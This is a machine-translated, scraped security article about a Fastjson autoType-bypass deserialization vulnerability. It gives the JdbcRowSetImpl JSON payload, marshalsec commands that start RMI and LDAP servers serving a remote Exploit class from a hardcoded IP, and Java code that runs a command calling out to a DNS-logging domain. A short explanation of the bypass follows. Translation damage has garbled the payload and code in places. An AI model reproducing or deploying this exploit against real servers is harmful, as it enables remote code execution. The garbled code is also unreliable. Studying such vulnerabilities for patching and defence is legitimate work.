In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-02-01 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)06/01 Report--
Reference link:
Https://paper.seebug.org/994/
Https://www.cnblogs.com/jinqi520/p/11097779.html
Https://xz.aliyun.com/t/5680
0x01 vulnerability recurrence RMi
1. Payload:
{"a": {
"@ type": "java.lang.Class", br/ > "a": {
"@ type": "java.lang.Class"
"b": {
"@ type": "com.sun.rowset.JdbcRowSetImpl", br/ >}
"b": {
"@ type": "com.sun.rowset.JdbcRowSetImpl"
"autoCommit": true
}
}
two。 Execute on xxx to start a rmi service
Java-cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://106.12.201.224/#Exploit"
Generate build * script
Save the following code as: Exploit.java
Then execute: javac Exploit.java to generate the class file
Import java.lang.Runtime;import java.lang.Process;public class Exploit {static {try {Runtime rt = Runtime.getRuntime (); String [] commands = {"touch", "/ tmp/success"}; Process pc = rt.exec ("ping fastjson.t00ls.7272e87394b4f7c0088c966cba58c1dd.tu4.org"); pc.waitFor () } catch (Exception e) {/ / do nothing} 0x02 vulnerability repeats LDAP
1. Payload:
{"a": {
"@ type": "java.lang.Class", br/ > "a": {
"@ type": "java.lang.Class"
"b": {
"@ type": "com.sun.rowset.JdbcRowSetImpl", br/ >}
"b": {
"@ type": "com.sun.rowset.JdbcRowSetImpl"
"autoCommit": true
}
}
two。 Execute on xxx to start a rmi service
Java-cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://106.12.201.224/#Exploit"
Generate build * script
Do not import packages in Exploit.java
Save the following code as: Exploit.java
Then execute: javac Exploit.java to generate the class file
Import java.lang.Runtime;import java.lang.Process;public class Exploit {static {try {Runtime rt = Runtime.getRuntime (); String [] commands = {"touch", "/ tmp/success"}; Process pc = rt.exec ("ping fastjson.t00ls.7272e87394b4f7c0088c966cba58c1dd.tu4.org"); pc.waitFor () } catch (Exception e) {/ / do nothing} 0x03 vulnerability principle
The general idea of this bypass is to load the JdbcRowSetImpl class into the map cache through java.lang.Class, thereby bypassing autotype detection. So the payload is sent twice, the first time it is loaded and the second time it is executed. By default, checkautotype throws an exception and aborts whenever it encounters a class that is not loaded into the cache.
When the first request is sent, the Class is loaded through deserializers.findClass, and then Class loads the JdbcRowSetImpl class into map, and then on the second request, the JdbcRowSetImpl class is successfully found here, bypassing detection.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.
12
Report
